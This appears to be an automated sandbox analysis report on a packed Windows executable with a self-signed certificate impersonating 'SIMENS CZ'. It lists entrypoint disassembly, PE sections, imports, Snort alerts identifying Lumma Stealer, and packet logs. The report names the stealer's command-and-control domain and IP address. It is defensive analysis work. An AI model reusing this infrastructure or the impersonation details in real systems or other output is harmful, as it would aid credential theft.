d5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a, OU=SIMENS CZ, O=Creted by CZ, CN=SIMENS CZ
                                                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                Error Number:-2146762487
                                                Not Before, Not After
                                                • 25/04/2024 10:56:03 16/06/2027 02:00:00
                                                Subject Chain
                                                • C=WORLD, S=WORLD, L=\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a, OU=SIMENS CZ, O=Creted by CZ, CN=SIMENS CZ
                                                Version:3
                                                Thumbprint MD5:C0363FC9208F48182C34AA42132CBC94
                                                Thumbprint SHA-1:0877E6CA4F2A53E360012E15357A51DDCC77FB0A
                                                Thumbprint SHA-256:7CE76CDCEB12CEE9859F09EF071929F588FD6004A2FAF1F72F94CD28AACFB81B
                                                Serial:5B0FDA9319F20C498AB1B9572E75AFFA

                                                Entrypoint Preview

                                                Instruction
                                                call 00007F226098F1CCh
                                                not ecx
                                                sar byte ptr [esp+02h], FFFFFFA1h
                                                adc esi, eax
                                                pop ecx
                                                jmp esi
                                                sub dword ptr [edx+16h], edx
                                                outsb
                                                push edi
                                                pop esp
                                                insb
                                                jmp far 6A2Ch : E4FB305Fh
                                                pop edi
                                                xor bl, bh
                                                lds esi, fword ptr [bp+si+0000305Fh]
                                                sti
                                                mov edi, 305FBA5Ch
                                                sti
                                                mov bh, B5h
                                                bound ebx, dword ptr [edi+30h]
                                                sti
                                                outsd
                                                sub eax, FB305FAAh
                                                movsb
                                                inc esp
                                                bound ebx, dword ptr [edi+30h]
                                                sti
                                                insb
                                                salc
                                                cmc
                                                pop edx
                                                aad 44h
                                                mov dh, 6Dh
                                                leave
                                                xchg eax, esp
                                                insb
                                                and eax, 292EB72Bh
                                                sub esp, dword ptr [eax+0000DA3Eh]
                                                add byte ptr [ecx], al
                                                xchg dword ptr [ecx+1FBB45F5h], ebp
                                                out dx, al
                                                fstp9 st(2)
                                                mov ebx, EE1DF2CEh
                                                cmpsd
                                                insb
                                                pop eax
                                                dec esi
                                                sbb eax, CB4407EEh
                                                scasb
                                                sbb eax, 2B8D87EEh
                                                push ds
                                                sbb eax, 22A277EEh
                                                inc edi
                                                std
                                                push edx
                                                mov ecx, 576E1723h
                                                sub eax, 305EFB0Dh
                                                sti
                                                idiv byte ptr [ebx+ecx*2]
                                                pop esi
                                                xor bl, bh
                                                inc ebp
                                                cmp al, 3Bh
                                                pop esi
                                                xor bl, bh
                                                inc esp
                                                ret
                                                pop esi
                                                xor bl, bh
                                                int 3Ch
                                                mov ebx, dword ptr [esi+30h]
                                                sti
                                                xchg byte ptr [FB305E83h], ah
                                                mov seg?, word ptr [ebx+ecx]
                                                pop esi
                                                xor bl, bh
                                                add eax, D55BD40Fh
                                                inc esp
                                                lahf
                                                pop esp
                                                sub byte ptr [ebp-056BC194h], dl
                                                mov dh, 2Eh
                                                sub edx, edi
                                                mov eax, dword ptr [0000DA3Eh]

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x8112c80x8c.vmp
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x8eb0000x150d2.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x5de2000x4fd8.vmp
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x8ea0000x67c.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x3210000x44.vmp
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x10000x38c5b0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rdata0x3a0000x290f0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data0x3d0000xa1b00x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .vmp0x480000x2d8b240x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .vmp0x3210000x2380x400ca31ecaf98144b7e1edf4253fd49f8e8False0.0634765625data0.34905982431271465IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .vmp0x3220000x5c7f800x5c80003896822c4f383dec63ac42e92499888aunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .reloc0x8ea0000x67c0x8002f54ec6397408509ca08b92b31a3eb11False0.421875data3.632026511195456IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .rsrc0x8eb0000x150d20x152001ed8253937d9e59a116482075694dec0False0.46001294378698226data4.906252212398212IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                TYPELIB0x8eb2180x68cdataEnglishUnited States0.324582338902148
                                                RT_ICON0x8eb8a40x468Device independent bitmap graphic, 16 x 32 x 32, image size 10240.7792553191489362
                                                RT_ICON0x8ebd0c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.6214821763602252
                                                RT_ICON0x8ecdb40x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 92160.5512448132780083
                                                RT_ICON0x8ef35c0x10828Device independent bitmap graphic, 128 x 256 x 32, image size 655360.4396220276824796
                                                RT_GROUP_ICON0x8ffb840x3edata0.7741935483870968
                                                RT_VERSION0x8ffbc40x324data0.4564676616915423
                                                RT_MANIFEST0x8ffee80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                Imports

                                                DLLImport
                                                KERNEL32.dllExitProcess
                                                OLEAUT32.dllSysAllocString
                                                ole32.dllCoCreateInstance
                                                USER32.dllCloseClipboard
                                                GDI32.dllBitBlt
                                                KERNEL32.dllHeapAlloc, HeapFree, ExitProcess, GetModuleHandleA, LoadLibraryA, GetProcAddress

                                                Possible Origin

                                                Language of compilation systemCountry where language is spokenMap
                                                EnglishUnited States

                                                Network Behavior

                                                Snort IDS Alerts

                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                04/25/24-17:38:58.817833TCP2052226ET TROJAN Observed Lumma Stealer Related Domain (shortsvelventysjo .shop in TLS SNI)49707443192.168.2.5104.21.16.225
                                                04/25/24-17:38:59.604921TCP2052226ET TROJAN Observed Lumma Stealer Related Domain (shortsvelventysjo .shop in TLS SNI)49708443192.168.2.5104.21.16.225
                                                04/25/24-17:39:03.546775TCP2052226ET TROJAN Observed Lumma Stealer Related Domain (shortsvelventysjo .shop in TLS SNI)49712443192.168.2.5104.21.16.225
                                                04/25/24-17:39:00.544364TCP2052226ET TROJAN Observed Lumma Stealer Related Domain (shortsvelventysjo .shop in TLS SNI)49709443192.168.2.5104.21.16.225
                                                04/25/24-17:39:05.734459TCP2052226ET TROJAN Observed Lumma Stealer Related Domain (shortsvelventysjo .shop in TLS SNI)49714443192.168.2.5104.21.16.225
                                                04/25/24-17:39:01.465789TCP2052226ET TROJAN Observed Lumma Stealer Related Domain (shortsvelventysjo .shop in TLS SNI)49710443192.168.2.5104.21.16.225
                                                04/25/24-17:39:04.372064TCP2052226ET TROJAN Observed Lumma Stealer Related Domain (shortsvelventysjo .shop in TLS SNI)49713443192.168.2.5104.21.16.225
                                                04/25/24-17:39:02.392596TCP2052226ET TROJAN Observed Lumma Stealer Related Domain (shortsvelventysjo .shop in TLS SNI)49711443192.168.2.5104.21.16.225
                                                04/25/24-17:38:58.683515UDP2052214ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (shortsvelventysjo .shop)5375153192.168.2.51.1.1.1

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Apr 25, 2024 17:38:58.816381931 CEST49707443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:38:58.816431999 CEST44349707104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:38:58.816518068 CEST49707443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:38:58.817832947 CEST49707443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:38:58.817853928 CEST44349707104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:38:59.053139925 CEST44349707104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:38:59.053443909 CEST49707443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:38:59.058782101 CEST49707443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:38:59.058794022 CEST44349707104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:38:59.059144020 CEST44349707104.21.16.225192.168.2.5
